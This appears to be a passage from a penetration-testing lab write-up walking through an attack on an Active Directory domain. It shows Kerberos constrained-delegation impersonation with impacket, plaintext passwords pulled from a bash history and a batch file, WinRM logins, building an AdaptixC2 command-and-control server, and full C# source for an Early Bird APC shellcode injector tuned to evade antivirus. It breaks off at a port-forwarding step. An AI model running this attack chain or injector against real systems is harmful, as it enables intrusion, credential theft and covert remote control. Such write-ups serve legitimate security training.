_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
fox:x:1000:1000:fox,,,:/home/fox:/bin/bash
sssd:x:102:109:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
polkitd:x:996:996:polkit:/nonexistent:/usr/sbin/nologin
wazuh:x:103:112::/var/ossec:/sbin/nologin

fox is a local account but IFIXTCENTCEN is not as not listed.

We take a look in IFIXTCENTCEN:

ilona@gabriel:/home$ cd IFIXTCENTCEN/
ilona@gabriel:/home/IFIXTCENTCEN$ ls -la
total 36
drwxr-xr-x 9 root        root 4096 Apr 25 20:18 .
drwxr-xr-x 4 root        root 4096 Apr 25 18:19 ..
drwxr-xr-x 5 ilona       root 4096 Jul 28 20:48 ilona
drwxr-xr-x 2 luanaborgia root 4096 Apr 25 19:56 luanaborgia
drwxr-xr-x 3 malone      root 4096 Apr 25 20:10 malone
drwx------ 2 platinette  root 4096 Apr 27 09:43 platinette
drwx------ 2 schicchi    root 4096 Apr 25 20:10 schicchi
drwx------ 2 schicchi    root 4096 Apr 25 23:25 schicchi.backup
drwx------ 3 selen       root 4096 Apr 25 20:06 selen

Seems this folder is maybe a SMB share as we found some user folders.

Enumeration:

ilona@gabriel:/home/IFIXTCENTCEN$ find .
.
./selen
find: ‘./selen’: Permission denied
./platinette
find: ‘./platinette’: Permission denied
./schicchi.backup
find: ‘./schicchi.backup’: Permission denied
./luanaborgia
./luanaborgia/.bashrc
./luanaborgia/.bash_history
./luanaborgia/.bash_logout
./luanaborgia/.profile
./schicchi
find: ‘./schicchi’: Permission denied
./malone
./malone/.ssh
find: ‘./malone/.ssh’: Permission denied
./malone/.bashrc
./malone/.bash_history
./malone/.bash_logout
./malone/.profile
./ilona
./ilona/.local
./ilona/.local/share
./ilona/.local/share/nano
./ilona/.ssh
./ilona/.ssh/known_hosts
./ilona/.gnupg
./ilona/.gnupg/pubring.kbx
./ilona/.gnupg/trustdb.gpg
./ilona/.gnupg/private-keys-v1.d
./ilona/.bash_history

Some users have .bash_history not empty, nothing more at this moment.

Kerberos Constrained Delegation (aka KCD) exploiting (malone,babypozzi,platinette,luanaborgia)

If a service account, configured with constrained delegation to another service, is compromised, an attacker can impersonate any user (e.g. domain admin, except users protected against delegation) in the environment to access another service the initial one can delegate to.

KCD mindmap BqD0fGv7

Credits: The Hacker Recipes - Kerberos Constrained Delegation

  • Impersonate malone then get his TGT:
$ impacket-getST -spn 'host/GABRIEL.ifixtcentcen.loc' -impersonate 'malone' ifixtcentcen.loc/ilona:'!!!!Sweet!!!!' -dc-ip 10.0.10.33
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating malone
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in malone@host_GABRIEL.ifixtcentcen.loc@IFIXTCENTCEN.LOC.ccache
  • Impersonate babypozzi then get his TGT:
$ impacket-getST -spn 'host/GABRIEL.ifixtcentcen.loc' -impersonate 'babypozzi' ifixtcentcen.loc/ilona:'!!!!Sweet!!!!' -dc-ip 10.0.10.33
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating babypozzi
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in babypozzi@host_GABRIEL.ifixtcentcen.loc@IFIXTCENTCEN.LOC.ccache

Use both + ilona to list SMB shares on GABRIEL:

$ export KRB5CCNAME=malone@host_GABRIEL.ifixtcentcen.loc@IFIXTCENTCEN.LOC.ccache; nxc smb GABRIEL.ifixtcentcen.loc -k --shares   
SMB         GABRIEL.ifixtcentcen.loc 445    GABRIEL          [*] Unix - Samba (name:GABRIEL) (domin:ifixtcentcen.loc) (signing:False) (SMBv1:False) (Null Auth:True)
SMB         GABRIEL.ifixtcentcen.loc 445    GABRIEL          [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
                                                                                                                                                                                                  
$ export KRB5CCNAME=babypozzi@host_GABRIEL.ifixtcentcen.loc@IFIXTCENTCEN.LOC.ccache; nxc smb GABRIEL.ifixtcentcen.loc -k --shares 
SMB         GABRIEL.ifixtcentcen.loc 445    GABRIEL          [*] Unix - Samba (name:GABRIEL) (domin:ifixtcentcen.loc) (signing:False) (SMBv1:False) (Null Auth:True)
SMB         GABRIEL.ifixtcentcen.loc 445    GABRIEL          [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
                                                                                                                                                                                                  
$ export KRB5CCNAME=ilona.ccache; nxc smb GABRIEL.ifixtcentcen.loc -k --shares 
SMB         GABRIEL.ifixtcentcen.loc 445    GABRIEL          [*] Unix - Samba (name:GABRIEL) (domin:ifixtcentcen.loc) (signing:False) (SMBv1:False) (Null Auth:True)
SMB         GABRIEL.ifixtcentcen.loc 445    GABRIEL          [-] Error enumerating shares: STATUS_USER_SESSION_DELETED

Nothing.

In our Domain users list, we found other accounts, so let’s impersonate them too then check SMB share:

  • luanaborgia:
$ impacket-getST -spn 'host/GABRIEL.ifixtcentcen.loc' -impersonate 'luanaborgia' ifixtcentcen.loc/ilona:'!!!!Sweet!!!!' -dc-ip 10.0.10.33 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating luanaborgia
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in luanaborgia@host_GABRIEL.ifixtcentcen.loc@IFIXTCENTCEN.LOC.ccache
$ export KRB5CCNAME=luanaborgia@host_GABRIEL.ifixtcentcen.loc@IFIXTCENTCEN.LOC.ccache; nxc smb GABRIEL.ifixtcentcen.loc -k --shares
SMB         GABRIEL.ifixtcentcen.loc 445    GABRIEL          [*] Unix - Samba (name:GABRIEL) (domin:ifixtcentcen.loc) (signing:False) (SMBv1:False) (Null Auth:True)
SMB         GABRIEL.ifixtcentcen.loc 445    GABRIEL          [-] Error enumerating shares: STATUS_USER_SESSION_DELETED

Failed.

  • platinette:
$ impacket-getST -spn 'host/GABRIEL.ifixtcentcen.loc' -impersonate 'platinette' ifixtcentcen.loc/ilona:'!!!!Sweet!!!!' -dc-ip 10.0.10.33 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Getting TGT for user
[*] Impersonating platinette
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in platinette@host_GABRIEL.ifixtcentcen.loc@IFIXTCENTCEN.LOC.ccache
$ export KRB5CCNAME=platinette@host_GABRIEL.ifixtcentcen.loc@IFIXTCENTCEN.LOC.ccache; nxc smb GABRIEL.ifixtcentcen.loc -k --shares
SMB         GABRIEL.ifixtcentcen.loc 445    GABRIEL          [*] Unix - Samba (name:GABRIEL) (domin:ifixtcentcen.loc) (signing:False) (SMBv1:False) (Null Auth:True)
SMB         GABRIEL.ifixtcentcen.loc 445    GABRIEL          [-] Error enumerating shares: STATUS_USER_SESSION_DELETED

SMB share (platinette)

After more research on Error enumerating shares: STATUS_USER_SESSION_DELETED, sometimes it’s because an EDR catch our request, especially when using Netexec…

To reduce the noice with the EDR, we switch to impacket smbclient, and that works:

$ impacket-smbclient -k GABRIEL.ifixtcentcen.loc                                                                                        
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# shares
homes
IPC$
platinette
# use platinette
# ls
drw-rw-rw-          0  Sun Apr 27 16:43:10 2025 .
drw-rw-rw-          0  Sat Apr 26 03:18:35 2025 ..
-rw-rw-rw-          0  Sat Apr 26 01:59:59 2025 peppe
-rw-rw-rw-        169  Sun Apr 27 16:43:10 2025 .bash_history
# cat .bash_history
^B^B^B
^B^B^B
^B^
^B^B
evill^H-winrm -i maryy^V^Hlinjess -u plato^Hinette -p A^G^Gssas^H^H^Hfronikhg^H^H^De^Aestra^E^E%
C
C
C
C
C
D
D
D
A
B
B
B
B
B
B
B
A
su - ra^B^Hoot

# mget .bash_history
[*] Downloading .bash_history
# exit

Then retry with previous account:

$ export KRB5CCNAME=luanaborgia@host_GABRIEL.ifixtcentcen.loc@IFIXTCENTCEN.LOC.ccache; impacket-smbclient -k GABRIEL.ifixtcentcen.loc
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# shares
homes
IPC$
luanaborgia
# use luanaborgia
# ls
drw-rw-rw-          0  Sat Apr 26 02:56:12 2025 .
drw-rw-rw-          0  Sat Apr 26 03:18:35 2025 ..
-rw-rw-rw-       3526  Sat Apr 26 02:56:09 2025 .bashrc
-rw-rw-rw-          5  Sat Apr 26 03:10:23 2025 .bash_history
-rw-rw-rw-        220  Sat Apr 26 02:56:09 2025 .bash_logout
-rw-rw-rw-        807  Sat Apr 26 02:56:09 2025 .profile
# cat .bash_history
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
# exit

Nothing is interesting.

  • schicchi:
$ impacket-getST -spn 'host/GABRIEL.ifixtcentcen.loc' -impersonate 'schicchi' ifixtcentcen.loc/ilona:'!!!!Sweet!!!!' -dc-ip 10.0.10.33 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating schicchi
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[-] Kerberos SessionError: KDC_ERR_BADOPTION(KDC cannot accommodate requested option)
[-] Probably SPN is not allowed to delegate by user ilona or initial TGT not forwardable

Impersonation is not possible, let’s double check:

$ bloodyAD -d ifixtcentcen.loc -u 'ilona' -p '!!!!Sweet!!!!' --host SOC.ifixtcentcen.loc get object 'schicchi' --attr UserAccountControl  

distinguishedName: CN=schicchi,CN=Users,DC=ifixtcentcen,DC=loc
userAccountControl: NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD; NOT_DELEGATED

The NOT_DELEGATED value in UserAccountControl means that “Account is sensitive and cannot be delegated” flag ensures that an account’s credentials cannot be forwarded to other computers or services on the network by a trusted application.

From our finding in the SMB share of platinette, we found an interesting string in her .bash_history:

evill^H-winrm -i maryy^V^Hlinjess -u plato^Hinette -p A^G^Gssas^H^H^Hfronikhg^H^H^De^Aestra^E^E%
SymbolMeaning
^HBackspace (deletes 1 char)
^GBell (Ctrl+G), no deletion
^DEOT or delete (could signal deletion or end-of-input)
^AStart of line (Ctrl+A), usually ignored here
^EEnd of line (Ctrl+E), usually ignored here
%Possibly just typed as literal %

Then we found the platinette’s credentials:

platinette:Asfronikestra%

Double check:

$ nxc smb SOC.ifixtcentcen.loc -u 'platinette' -p 'Asfronikestra%'                                                             
SMB         10.0.10.33      445    SOC              [*] Windows 10 / Server 2019 Build 17763 x64 (name:SOC) (domin:ifixtcentcen.loc) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.0.10.33      445    SOC              [+] ifixtcentcen.loc\platinette:Asfronikestra% 
$ nxc winrm MARYLINJESS.ifixtcentcen.loc -u 'platinette' -p 'Asfronikestra%' 
WINRM       10.0.10.34      5985   MARYLINJESS      [*] Windows 10 / Server 2019 Build 17763 (name:MARYLINJESS) (domain:ifixtcentcen.loc) 
WINRM       10.0.10.34      5985   MARYLINJESS      [+] ifixtcentcen.loc\platinette:Asfronikestra% (Pwn3d!)

Access confirmed.

MARYLINJESS

Credential hunting (malone)

Let’s enumerate:

$ git clone https://github.com/ozelis/winrmexec.git 
$ python3 winrmexec/evil_winrmexec.py 'ifixtcentcen.loc/platinette:Asfronikestra%@MARYLINJESS.ifixtcentcen.loc' -dc-ip 10.0.10.33
[*] '-target_ip' not specified, using MARYLINJESS.ifixtcentcen.loc
[*] '-port' not specified, using 5985
[*] '-url' not specified, using http://MARYLINJESS.ifixtcentcen.loc:5985/wsman
PS C:\Users\platinette\Documents>

Check the privileges:

PS C:\Users\platinette\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Nothing is interesting.

PS C:\Users\platinette\Documents> cd c:\
PS C:\> dir


    Directory: C:\


Mode                LastWriteTime         Length Name                                                                   
----                -------------         ------ ----                                                                   
d-----        7/29/2025   7:44 AM                autocmd                                                                
d-----        11/5/2022  12:03 PM                PerfLogs                                                               
d-r---        4/27/2025  12:57 AM                Program Files                                                          
d-----        4/30/2025   1:08 AM                Program Files (x86)                                                    
d-----        7/29/2025   9:34 AM                temp                                                                   
d-r---        4/26/2025   7:38 AM                Users                                                                  
d-----        7/28/2025   4:36 PM                Windows

autocmd is not a folder present with the default installation.

Check this folder and found an insteresting file:

PS C:\> cd autocmd
PS C:\autocmd> dir


    Directory: C:\autocmd


Mode                LastWriteTime         Length Name                                                                   
----                -------------         ------ ----                                                                   
-a----        4/25/2025  11:12 PM            124 emptydb.bat                                                            


PS C:\autocmd> type emptydb.bat
sqlcmd -S dbOne.divafutura.loc -U malone@ifixtcentcen.loc -P SGnucc%%erE -Q "delete from passwd where user like '%evil%';"

Found malone:SGnucc%%erE.

Check it:

$ nxc smb SOC.ifixtcentcen.loc -u 'malone' -p 'SGnucc%%erE'                  
SMB         10.0.10.33      445    SOC              [*] Windows 10 / Server 2019 Build 17763 x64 (name:SOC) (domin:ifixtcentcen.loc) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.0.10.33      445    SOC              [-] ifixtcentcen.loc\malone:SGnucc%%erE STATUS_LOGON_FAILURE 

Failed then seems only used for SQL to dbOne.divafutura.loc

Check privilege escalation using winpeas:

PS C:\programdata> !upload winPEASx64_ofs.exe w.exe
PS C:\programdata> .\w.exe
 [!] If you want to run the file analysis checks (search sensitive information in files), you need to specify the 'fileanalysis' or 'all' argument. Note that this search might take several minutes. For help, run winpeass.exe --help
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
     
               ((((((((((((((((((((((((((((((((
        (((((((((((((((((((((((((((((((((((((((((((
      ((((((((((((((**********/##########(((((((((((((   
    ((((((((((((********************/#######(((((((((((
    ((((((((******************/@@@@@/****######((((((((((
    ((((((********************@@@@@@@@@@/***,####((((((((((
    (((((********************/@@@@@%@@@@/********##(((((((((
    (((############*********/%@@@@@@@@@/************((((((((
    ((##################(/******/@@@@@/***************((((((
    ((#########################(/**********************(((((
    ((##############################(/*****************(((((
    ((###################################(/************(((((
    ((#######################################(*********(((((
    ((#######(,.***.,(###################(..***.*******(((((
    ((#######*(#####((##################((######/(*****(((((
    ((###################(/***********(##############()(((((
    (((#####################/*******(################)((((((
    ((((############################################)((((((
    (((((##########################################)(((((((
    ((((((########################################)(((((((
    ((((((((####################################)((((((((
    (((((((((#################################)(((((((((
        ((((((((((##########################)(((((((((
              ((((((((((((((((((((((((((((((((((((((
                 ((((((((((((((((((((((((((((((

ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own devices and/or with the device owner's permission.

  WinPEAS-ng by @hacktricks_live
...

Nothing is interesting.

C2 cooking

Quick check and see that this server can not joined our attacker machine but can join the jump box:

PS C:\autocmd> ping 10.8.0.131

Pinging 10.8.0.131 with 32 bytes of data:
PING: transmit failed. General failure. 
PING: transmit failed. General failure. 
PING: transmit failed. General failure. 
PING: transmit failed. General failure. 

Ping statistics for 10.8.0.131:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

PS C:\autocmd> ping 10.0.10.200

Pinging 10.0.10.200 with 32 bytes of data:
Reply from 10.0.10.200: bytes=32 time<1ms TTL=64
Reply from 10.0.10.200: bytes=32 time<1ms TTL=64
Reply from 10.0.10.200: bytes=32 time<1ms TTL=64
Reply from 10.0.10.200: bytes=32 time<1ms TTL=64

Ping statistics for 10.0.10.200:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

We compile, configure AdaptixC2 + Extension-Kit then create a beacon agent:

$ git clone https://github.com/Adaptix-Framework/AdaptixC2.git
$ cd AdaptixC2
$ sudo apt install mingw-w64 make gcc g++ g++-mingw-w64
$ sudo apt install golang-go
$ sudo apt install gcc g++ build-essential make cmake mingw-w64 g++-mingw-w64 libssl-dev qt6-base-dev qt6-websockets-dev qt6-declarative-dev
$ make server
$ make extenders
$ make client
$ git clone https://github.com/Adaptix-Framework/Extension-Kit
$ cd Extension-Kit
$ make
$ ls dist              
404page.html  AdaptixClient  adaptixserver  extenders  profile.json  ssl_gen.sh
$ cd dist
$ openssl req -x509 -noenc -newkey ec -pkeyopt ec_paramgen_curve:secp384r1 -keyout server.ecdsa.key -out server.ecdsa.crt -days 3650
$ ls     
404page.html  AdaptixClient  adaptixserver  extenders  profile.json  server.ecdsa.crt  server.ecdsa.key  ssl_gen.sh
$ cat profile.json 
{
  "Teamserver": {
    "interface": "127.0.0.1",
    "port": 4321,
    "endpoint": "/endpoint",
    "password": "azerty123!",
    "cert": "server.ecdsa.crt",
    "key": "server.ecdsa.key",
    "extenders": [
      "extenders/listener_beacon_http/config.json",
      "extenders/listener_beacon_smb/config.json",
      "extenders/listener_beacon_tcp/config.json",
      "extenders/agent_beacon/config.json",
      "extenders/listener_gopher_tcp/config.json",
      "extenders/agent_gopher/config.json"
    ],
    "access_token_live_hours": 12,
    "refresh_token_live_hours": 168
  },

  "ServerResponse": {
    "status": 404,
    "headers": {
      "Content-Type": "text/html; charset=UTF-8",
      "Server": "AdaptixC2",
      "Adaptix Version": "v0.7"
    },
    "page": "404page.html"
  },

  "EventCallback": {
    "Telegram": {
      "token": "",
      "chats_id": []
    },
    "new_agent_message": "New agent: %type% (%id%)\n\n%user% @ %computer% (%internalip%)\nelevated: %elevated%\nfrom: %externalip%\ndomain: %domain%"
  }
}

Start the server:

$ ./adaptixserver -profile profile.json     

[===== Adaptix Framework v0.7 =====]

[+] Starting server -> https://127.0.0.1:4321/endpoint [07/08 19:47:00]
[*] Restore data from Database... [07/08 19:47:00]
   [+] Restored 0 agents [07/08 19:47:00]
   [+] Restored 0 pivots [07/08 19:47:00]
   [+] Restored 0 downloads [07/08 19:47:00]
   [+] Restored 0 screens [07/08 19:47:00]
   [+] Restored 0 credentials [07/08 19:47:00]
   [+] Restored 0 listeners [07/08 19:47:00]

Start the client:

$ ./AdaptixClient

image

Create our listener:

image

image

Generate our beacon shellcode:

image

Let’s create our final stage1 using an Early Bird APC Injection combined with Process Doppelgänging for better evasion:

$ cat APCInject.csproj 
<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net40</TargetFramework>
    <!--<TargetFramework>net46</TargetFramework>-->
    <ImplicitUsings>enable</ImplicitUsings>
    <LangVersion>10.0</LangVersion>
    <Nullable>enable</Nullable>
    <PlatformTarget>x64</PlatformTarget>
    <AllowUnsafeBlocks>true</AllowUnsafeBlocks>
    <NoWarn>CS8600;CS8601;CS8602;CS8603;CS8604</NoWarn>
    <!-- Remove all debug, symbol for better AV and Static analysis evasion -->
    <DebugType>None</DebugType>
    <DebugSymbols>false</DebugSymbols>
    <Optimize>true</Optimize>
    <!-- Disable automatic reference inclusion -->
    <DisableImplicitFrameworkReferences>true</DisableImplicitFrameworkReferences>
  </PropertyGroup>

  <ItemGroup>
    <EmbeddedResource Include="agent.x64.bin" />
  </ItemGroup>

  <!-- Essential .NET 4.0 references -->
  <ItemGroup>
    <Reference Include="System" />
    <Reference Include="System.Core" />
    <Reference Include="System.Security" />
    <Reference Include="Microsoft.CSharp" />
    <Reference Include="System.Management" />
  </ItemGroup>
</Project>
$ cat Program.cs      
// Shellcode Execution with Process Persistence
// using Early Bird APC Injection combined with Process Doppelgänging for better evasion. 
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;

class Program
{
    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION
    {
        public IntPtr hProcess;
        public IntPtr hThread;
        public uint dwProcessId;
        public uint dwThreadId;
    }

    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct STARTUPINFO
    {
        public uint cb;
        public string lpReserved;
        public string lpDesktop;
        public string lpTitle;
        public uint dwX;
        public uint dwY;
        public uint dwXSize;
        public uint dwYSize;
        public uint dwXCountChars;
        public uint dwYCountChars;
        public uint dwFillAttribute;
        public uint dwFlags;
        public short wShowWindow;
        public short cbReserved2;
        public IntPtr lpReserved2;
        public IntPtr hStdInput;
        public IntPtr hStdOutput;
        public IntPtr hStdError;
    }

    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
    static extern bool CreateProcess(
        string lpApplicationName,
        string lpCommandLine,
        IntPtr lpProcessAttributes,
        IntPtr lpThreadAttributes,
        bool bInheritHandles,
        uint dwCreationFlags,
        IntPtr lpEnvironment,
        string lpCurrentDirectory,
        ref STARTUPINFO lpStartupInfo,
        out PROCESS_INFORMATION lpProcessInformation);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr VirtualAllocEx(
        IntPtr hProcess,
        IntPtr lpAddress,
        uint dwSize,
        uint flAllocationType,
        uint flProtect);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool WriteProcessMemory(
        IntPtr hProcess,
        IntPtr lpBaseAddress,
        byte[] lpBuffer,
        uint nSize,
        out IntPtr lpNumberOfBytesWritten);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern uint ResumeThread(IntPtr hThread);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CloseHandle(IntPtr hObject);

    [DllImport("ntdll.dll", SetLastError = true)]
    static extern uint NtSuspendProcess(IntPtr hProcess);

    [DllImport("ntdll.dll", SetLastError = true)]
    static extern uint NtResumeProcess(IntPtr hProcess);

    const uint CREATE_SUSPENDED = 0x00000004;
    const uint MEM_COMMIT = 0x00001000;
    const uint MEM_RESERVE = 0x00002000;
    const uint PAGE_EXECUTE_READWRITE = 0x40;

    static void Main()
    {
        try
        {
            byte[] shellcode = ExtractEmbeddedResource();
            if (shellcode == null || shellcode.Length == 0) return;

            // Try multiple target processes
            string[] targets = {
                @"C:\Windows\System32\rundll32.exe",
                @"C:\Windows\System32\svchost.exe",
                @"C:\Windows\System32\notepad.exe"
            };

            foreach (var target in targets)
            {
                if (EarlyBirdInjection(target, shellcode))
                {
                    return; // Success
                }
            }
        }
        catch
        {
            // Silent failure
        }
    }

    static byte[] ExtractEmbeddedResource()
    {
        try
        {
            var assembly = Assembly.GetExecutingAssembly();
            var resourceName = $"{assembly.GetName().Name}.agent.x64.bin";

            using (Stream stream = assembly.GetManifestResourceStream(resourceName))
            {
                if (stream == null) return new byte[0];
                byte[] buffer = new byte[stream.Length];
                stream.Read(buffer, 0, buffer.Length);
                return buffer;
            }
        }
        catch
        {
            return new byte[0];
        }
    }

    static bool EarlyBirdInjection(string targetPath, byte[] shellcode)
    {
        STARTUPINFO si = new STARTUPINFO
        {
            lpReserved = string.Empty,
            lpDesktop = string.Empty,
            lpTitle = string.Empty,
            cb = (uint)Marshal.SizeOf(typeof(STARTUPINFO))
        };

        PROCESS_INFORMATION pi = new PROCESS_INFORMATION();

        // Create process in suspended state
        bool success = CreateProcess(
            targetPath,
            null,
            IntPtr.Zero,
            IntPtr.Zero,
            false,
            CREATE_SUSPENDED,
            IntPtr.Zero,
            null,
            ref si,
            out pi);

        if (!success) return false;

        try
        {
            // Allocate memory in target process
            IntPtr pRemoteCode = VirtualAllocEx(
                pi.hProcess,
                IntPtr.Zero,
                (uint)shellcode.Length,
                MEM_COMMIT | MEM_RESERVE,
                PAGE_EXECUTE_READWRITE);

            if (pRemoteCode == IntPtr.Zero) return false;

            // Write shellcode to target process
            IntPtr bytesWritten;
            success = WriteProcessMemory(
                pi.hProcess,
                pRemoteCode,
                shellcode,
                (uint)shellcode.Length,
                out bytesWritten);

            if (!success) return false;

            // Queue APC to execute shellcode when thread starts
            IntPtr result = QueueUserAPC(pRemoteCode, pi.hThread, IntPtr.Zero);
            if (result == IntPtr.Zero) return false;

            // Resume thread (will execute APC)
            uint resumeResult = ResumeThread(pi.hThread);
            if (resumeResult == unchecked((uint)-1)) return false;

            return true;
        }
        catch
        {
            return false;
        }
        finally
        {
            if (pi.hProcess != IntPtr.Zero) CloseHandle(pi.hProcess);
            if (pi.hThread != IntPtr.Zero) CloseHandle(pi.hThread);
        }
    }
}
$ cat NativeMethods.cs 
using System;
using System.Runtime.InteropServices;

internal static class NativeMethods
{
    [DllImport("kernel32.dll")]
    public static extern IntPtr GetCurrentProcess();

    [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    public static extern IntPtr GetModuleHandle(string lpModuleName);

    [DllImport("kernel32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
    public static extern IntPtr VirtualAllocExNuma(
        IntPtr hProcess,
        IntPtr lpAddress,
        uint dwSize,
        uint flAllocationType,
        uint flProtect,
        uint nndPreferred);

    [DllImport("kernel32.dll")]
    public static extern bool VirtualProtect(
        IntPtr lpAddress,
        uint dwSize,
        uint flNewProtect,
        out uint lpflOldProtect);

    [DllImport("kernel32.dll")]
    public static extern IntPtr CreateThread(
        IntPtr lpThreadAttributes,
        uint dwStackSize,
        IntPtr lpStartAddress,
        IntPtr lpParameter,
        uint dwCreationFlags,
        out uint lpThreadId);

    [DllImport("kernel32.dll")]
    public static extern uint WaitForSingleObject(
        IntPtr hHandle,
        uint dwMilliseconds);

    [DllImport("ntdll.dll", SetLastError = true)]
    public static extern uint NtDelayExecution(
        bool Alertable,
        ref long DelayInterval);

    [DllImport("ntdll.dll", SetLastError = true)]
    public static extern uint NtQuerySystemInformation(
        uint SystemInformationClass,
        IntPtr SystemInformation,
        uint SystemInformationLength,
        out uint ReturnLength);
}
$ cat Directory.Build.targets 
<Project>

  <!-- Workaround for https://github.com/dotnet/sdk/issues/24146 -->
  <ItemGroup Condition=" '$(TargetFrameworkIdentifier)' == '.NETFramework' ">
    <Using Remove="System.Net.Http" />
  </ItemGroup>
  <ItemGroup Condition=" '$(TargetFrameworkIdentifier)' == '.NETFramework' AND $([MSBuild]::VersionLessThan($(TargetFrameworkVersion), '4.0')) ">
    <Using Remove="System.Threading.Tasks" />
  </ItemGroup>
  <ItemGroup Condition=" '$(TargetFrameworkIdentifier)' == '.NETFramework' AND $([MSBuild]::VersionLessThan($(TargetFrameworkVersion), '3.5')) ">
    <Using Remove="System.Linq" />
  </ItemGroup>

</Project>

Compile it:

$ dotnet build -c Release -o build -r win-x64

Welcome to .NET 6.0!
---------------------
SDK Version: 6.0.400

----------------
Installed an ASP.NET Core HTTPS development certificate.
To trust the certificate run 'dotnet dev-certs https --trust' (Windows and macOS only).
Learn about HTTPS: https://aka.ms/dotnet-https
----------------
Write your first app: https://aka.ms/dotnet-hello-world
Find out what's new: https://aka.ms/dotnet-whats-new
Explore documentation: https://aka.ms/dotnet-docs
Report issues and find source on GitHub: https://github.com/dotnet/core
Use 'dotnet --help' to see available commands or visit: https://aka.ms/dotnet-cli
--------------------------------------------------------------------------------------
MSBuild version 17.3.0+92e077650 for .NET
  Determining projects to restore...
  Restored /home/user/Downloads/ERTLAB/IFIX-TCEN-TCEN/APCInject.csproj (in 7.15 sec).
/home/user/Downloads/ERTLAB/IFIX-TCEN-TCEN/Program.cs(156,13): warning CS8625: Cannot convert null literal to non-nullable reference type. [/home/user/Downloads/ERTLAB/IFIX-TCEN-TCEN/APCInject.csproj]
/home/user/Downloads/ERTLAB/IFIX-TCEN-TCEN/Program.cs(162,13): warning CS8625: Cannot convert null literal to non-nullable reference type. [/home/user/Downloads/ERTLAB/IFIX-TCEN-TCEN/APCInject.csproj]
  APCInject -> /home/user/Downloads/ERTLAB/IFIX-TCEN-TCEN/build/APCInject.exe

Build succeeded.

/home/user/Downloads/ERTLAB/IFIX-TCEN-TCEN/Program.cs(156,13): warning CS8625: Cannot convert null literal to non-nullable reference type. [/home/user/Downloads/ERTLAB/IFIX-TCEN-TCEN/APCInject.csproj]
/home/user/Downloads/ERTLAB/IFIX-TCEN-TCEN/Program.cs(162,13): warning CS8625: Cannot convert null literal to non-nullable reference type. [/home/user/Downloads/ERTLAB/IFIX-TCEN-TCEN/APCInject.csproj]
    2 Warning(s)
    0 Error(s)

Time Elapsed 00:00:08.61
$ cp build/APCInject.exe ./c0nn3ct.exe
$ file c0nn3ct.exe 
c0nn3ct.exe: PE32+ executable for MS Windows 4.00 (console), x86-64 Mono/.Net assembly, 2 sections

Batch file take over (malone) (MARYLINJESS\administrator)

Set a port forwarder running socat to redirect traffic from local port 4321 of our jump machine RED to our remote attacker machine:

$ sshpass -p "I'mthebest" ssh -o 'StrictHostKeyChecking=accept-new' -o 'StrictHostKeyChecking=no' red@10.0.10.200
